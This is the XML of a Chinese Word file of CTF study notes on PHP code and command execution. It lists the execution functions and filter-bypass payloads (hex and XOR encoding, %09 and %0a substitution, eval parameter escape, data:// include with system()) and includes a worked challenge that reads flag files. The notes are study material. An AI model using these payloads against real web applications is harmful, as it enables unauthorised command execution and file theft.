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代码&amp;命令执行漏洞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常见函数：system，exec，passthru，shell_exec，popen，proc_open，pcntl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需要注意的点：怎么运行，运行条件，参数，能否回显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System函数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system(string $commend,int $return_var=?)第一项是执行语句，第二个是返回值0和1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可以直接回显，不用echo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exec($command,array$output=?,$return_var=?)第一项是执行语句，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不会回显，执行语句的结果会放在output数组中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，可以用print_r输出数组来输出执行结果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例如：exec($cmd,$array);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print_r($array);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passthru函数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passthru(string $command,int &amp;$return_var)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有回显，与system相似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shell_exec函数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shell_exec($command)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借用echo和print来输出结果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popen函数</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>（python命令执行也有这个函数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popen($command,$mode)mode是个参数，r表示阅读，w表示写入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用fgets获取内容，print_r输出内容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$ben=popen(xxx,r)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$s=fgets($ben)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print_r($s)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preg_replace函数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preg_replace — 执行一个正则表达式的搜索和替换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mixed preg_replace( mixed $pattern, mixed $replacement, mixed $subject)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搜索subject中匹配pattern的部分，以replacement进行替换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highlight w:val="lightGray"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>。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如果pattern的模式修饰符使用/e，那么当subject被匹配成功时，replacement会被当做PHP代码执行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例如：</w:t>
      </w:r>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="1884045" cy="111760"/>
            <wp:effectExtent l="0" t="0" r="825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PS： preg_replace()+函数的/e修饰符在PHP7中被移除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assert函数（高版本被弃用</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr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&lt;?php</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr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    $dd=$_REQUEST['dd'];</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr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    assert($dd);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:leftChars="0" w:firstLine="42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?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:leftChars="0" w:firstLine="42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传入$dd=phpinfo()；即可执行命令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回调函数($callback是函数名，其他变量是参数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array_map()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：array_map (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, array $array) : array(返回值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call_user_func()：call_user_func (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[, mixed $parameter] ) : mixed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array_filter()：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array_filter ( array $array [，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[, int $flag = 0 ]] ) : array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常见的绕过方式</w:t>
      </w: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字符串转义绕过：（绕过preg_match函数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def hex_payload(payload):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#16进制转义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res_payload = ''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for i in payload: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 = "\\x" + hex(ord(i))[2:]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res_payload += i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print("[+]'{}' Convert to hex: \"{}\"".format(payload,res_payload))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03145" cy="135636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2.字符串拼接绕过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字符串拼接绕过适用于绕过过滤具体关键字的限制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例如(p.hpinfo)()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3.异或绕过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13560" cy="1367155"/>
            <wp:effectExtent l="0" t="0" r="254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9335" cy="1212215"/>
            <wp:effectExtent l="0" t="0" r="1206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eastAsia="宋体" w:cs="Calibri Light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Calibri Light" w:hAnsi="Calibri Light" w:cs="Calibri Light"/>
          <w:color w:val="080808"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>转换代码：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18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pP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payload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"phpinfo()"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 = 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,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,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]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i/>
          <w:iCs/>
          <w:color w:val="8C8C8C"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t># strlist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t>是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Calibri Light" w:hAnsi="Calibri Light" w:cs="Calibri Light"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="8C8C8C"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>ascii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t>表中所有非字母数字的字符十进制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str1, str2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''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char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payload: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j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(i ^ j == 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ord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(char)):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i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'%{:0&gt;2}'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.format(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hex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(i)[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:])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j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'%{:0&gt;2}'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.format(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hex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(j)[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:])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"('{0}'^'{1}')"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.format(i, j), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Calibri Light" w:hAnsi="Calibri Light" w:cs="Calibri Light"/>
          <w:color w:val="660099"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>end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=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"."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>break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        else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>continue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        break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4.url取反绕过...（感觉用不到了...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5.其他绕过方式：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[e-e]=e#数组绕过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原理：php str_contains只过滤字符串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93290" cy="1673225"/>
            <wp:effectExtent l="0" t="0" r="381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构造字符串：?x=fil[e-e]:///fla[g-g]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替换绕过函数过滤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例题：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if(!preg_match(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/exec|system|popen|proc_open|\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/i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,$cmd)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这句话是正则表达式过滤exec等执行函数，i表示不区分大小写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highlight w:val="green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green"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>使用passthru绕过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4"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>命令执行绕过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①替换绕过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替换：“ ”--&gt;%09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如果/被过滤，可以使用cd指令和用；作为分隔符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>“；”</w:t>
      </w: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可以在url中用</w:t>
      </w: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</w:rPr>
        <w:t>%0a代替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②反斜杠绕过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5273675" cy="875665"/>
            <wp:effectExtent l="0" t="0" r="952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③正则匹配绕过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84120" cy="83693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参数逃逸(传入新参数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未过滤eval,;,...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?a=eval($_GET[1]);&amp;1=phpinfo();/system(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tac fla*.php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配合包含&amp;伪协议//未过滤include但过滤了；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?a=include$_GET[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i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]?&gt;&amp;i=data://text/plain,&lt;?=system(tac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文件包含与命令执行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无回显rce：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无回显的执行函数：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shell_exec()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`` （反引号）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这些需要php函数echo才可以输出结果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1、复制到可访问文件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tee命令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：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 命令可用于创建或追加写入文件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可配合cat等打开文件命令和管道符将flag写入到规定文件中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先将根目录复制到某个文件，然后访问查看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ls /| tee ls.txt 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ls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再复制flag文件，然后访问查看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cat /flag.php | tee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url/falg.txt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还可以使用其他的复制方法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copy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mv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扫描目录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例题：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 xml:space="preserve">&lt;?php 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error_reporting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0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if(!isset(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$_GET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[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'num'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])){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show_source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__FILE__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}else{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$str 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=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$_GET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[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'num'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$blacklist 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= [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 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'\t'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'\r'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'\n'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'\''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'"'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'`'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'\['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'\]'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'\$'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'\\'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'\^'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foreach (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$blacklist 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as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$blackitem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 {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        if (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preg_match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'/' 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.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$blackitem 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. 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'/m'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$str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)) {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                die(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"what are you want to do?"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                }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        }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        eval(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'echo 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.</w:t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$str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>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="5"/>
          <w:rFonts w:hint="default" w:ascii="Calibri Light" w:hAnsi="Calibri Light" w:eastAsia="宋体" w:cs="Calibri Light"/>
          <w:color w:val="DD0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';'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t xml:space="preserve">} </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="5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00BB"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>?&gt;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0000FF"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="5"/>
          <w:rFonts w:hint="eastAsia" w:ascii="Calibri Light" w:hAnsi="Calibri Light" w:eastAsia="宋体" w:cs="Calibri Light"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>题解：为了弄清楚flag在哪个文件里，需要用到语句</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>var_dump(scandir(/))</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>来打印出目录，然后观察到/被过滤了，所以需要绕过。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可以用ascii码绕过：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yellow"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>chr（47）=/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31051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  <w:t>注解：这题用waf对url进行过滤，需要在问号后加入%20（url编码后的空格来绕过过滤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  <w:t>Eval读取文件操作，可以通过</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>file_get_contents(/f1ag)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74DDB"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="BFC74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7B8D09"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="687B8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7becabde-e66e-46bd-995c-60fc1fbb0717"/>
  </w:docVars>
  <w:rsids>
    <w:rsidRoot w:val="00000000"/>
    <w:rsid w:val="02141FA3"/>
    <w:rsid w:val="03045209"/>
    <w:rsid w:val="03BB7FBE"/>
    <w:rsid w:val="04D70E27"/>
    <w:rsid w:val="05C10431"/>
    <w:rsid w:val="0717375D"/>
    <w:rsid w:val="08712DFF"/>
    <w:rsid w:val="090A529D"/>
    <w:rsid w:val="0F5A4B2F"/>
    <w:rsid w:val="0FD108E2"/>
    <w:rsid w:val="12241424"/>
    <w:rsid w:val="1430394D"/>
    <w:rsid w:val="1683496B"/>
    <w:rsid w:val="193E6753"/>
    <w:rsid w:val="19E86BA0"/>
    <w:rsid w:val="1A772D24"/>
    <w:rsid w:val="1B175E2B"/>
    <w:rsid w:val="1B1F66EE"/>
    <w:rsid w:val="1C00080C"/>
    <w:rsid w:val="1C4447F4"/>
    <w:rsid w:val="1EAD14CF"/>
    <w:rsid w:val="20520045"/>
    <w:rsid w:val="24855D52"/>
    <w:rsid w:val="25AB295A"/>
    <w:rsid w:val="26307F40"/>
    <w:rsid w:val="27595274"/>
    <w:rsid w:val="2BCE7FDF"/>
    <w:rsid w:val="2BFA79FD"/>
    <w:rsid w:val="2DF04DD1"/>
    <w:rsid w:val="30B21027"/>
    <w:rsid w:val="318B0720"/>
    <w:rsid w:val="31AB77E8"/>
    <w:rsid w:val="342A4220"/>
    <w:rsid w:val="348E21E2"/>
    <w:rsid w:val="38DC0E1C"/>
    <w:rsid w:val="39E66E3B"/>
    <w:rsid w:val="3ACA7481"/>
    <w:rsid w:val="3AD9074E"/>
    <w:rsid w:val="3B577DC9"/>
    <w:rsid w:val="3C3745ED"/>
    <w:rsid w:val="3C9E1C4F"/>
    <w:rsid w:val="3CF03B2D"/>
    <w:rsid w:val="3EC86CF2"/>
    <w:rsid w:val="3EF01EE7"/>
    <w:rsid w:val="42DF60FC"/>
    <w:rsid w:val="43946BDC"/>
    <w:rsid w:val="442962A2"/>
    <w:rsid w:val="460C7C2A"/>
    <w:rsid w:val="46897F3C"/>
    <w:rsid w:val="472352C8"/>
    <w:rsid w:val="473837F8"/>
    <w:rsid w:val="48501D98"/>
    <w:rsid w:val="491312CF"/>
    <w:rsid w:val="49500449"/>
    <w:rsid w:val="4BC706CB"/>
    <w:rsid w:val="4D693BB4"/>
    <w:rsid w:val="4DA70238"/>
    <w:rsid w:val="4FD327B9"/>
    <w:rsid w:val="4FD70FC7"/>
    <w:rsid w:val="50341960"/>
    <w:rsid w:val="5325697A"/>
    <w:rsid w:val="53AC47FA"/>
    <w:rsid w:val="56D402F0"/>
    <w:rsid w:val="56F216CA"/>
    <w:rsid w:val="578C34B8"/>
    <w:rsid w:val="57BA6C63"/>
    <w:rsid w:val="58421A71"/>
    <w:rsid w:val="5A6A63DA"/>
    <w:rsid w:val="5AA220B4"/>
    <w:rsid w:val="5B8C73EB"/>
    <w:rsid w:val="5C960276"/>
    <w:rsid w:val="5CAE06AA"/>
    <w:rsid w:val="5EC66F2A"/>
    <w:rsid w:val="5FB54A36"/>
    <w:rsid w:val="5FB63A2F"/>
    <w:rsid w:val="62E80218"/>
    <w:rsid w:val="64126F32"/>
    <w:rsid w:val="64416899"/>
    <w:rsid w:val="695928D6"/>
    <w:rsid w:val="697D4817"/>
    <w:rsid w:val="6D1234C8"/>
    <w:rsid w:val="6D495DF8"/>
    <w:rsid w:val="6F751F4E"/>
    <w:rsid w:val="6FE3114C"/>
    <w:rsid w:val="700862B8"/>
    <w:rsid w:val="71CE5B38"/>
    <w:rsid w:val="72F97F7A"/>
    <w:rsid w:val="733F2678"/>
    <w:rsid w:val="739B4802"/>
    <w:rsid w:val="740F0761"/>
    <w:rsid w:val="75A924F0"/>
    <w:rsid w:val="785430E1"/>
    <w:rsid w:val="79697F69"/>
    <w:rsid w:val="79892CD6"/>
    <w:rsid w:val="7AC433AB"/>
    <w:rsid w:val="7AE91B90"/>
    <w:rsid w:val="7CB62F29"/>
    <w:rsid w:val="7D821FA4"/>
    <w:rsid w:val="7DA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1159</Words>
  <Characters>3077</Characters>
  <Lines>0</Lines>
  <Paragraphs>0</Paragraphs>
  <TotalTime>4</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>3620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2024-01-17T05:03:00Z</dcterms:created>
  <dc:creator>0629</dc:creator>
  <cp:lastModifiedBy>【】</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-03-11T05:55:44Z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8664ED48D90E4E538A549C6C795EB842</vt:lpwstr>
  </property>
</Properties>
</file>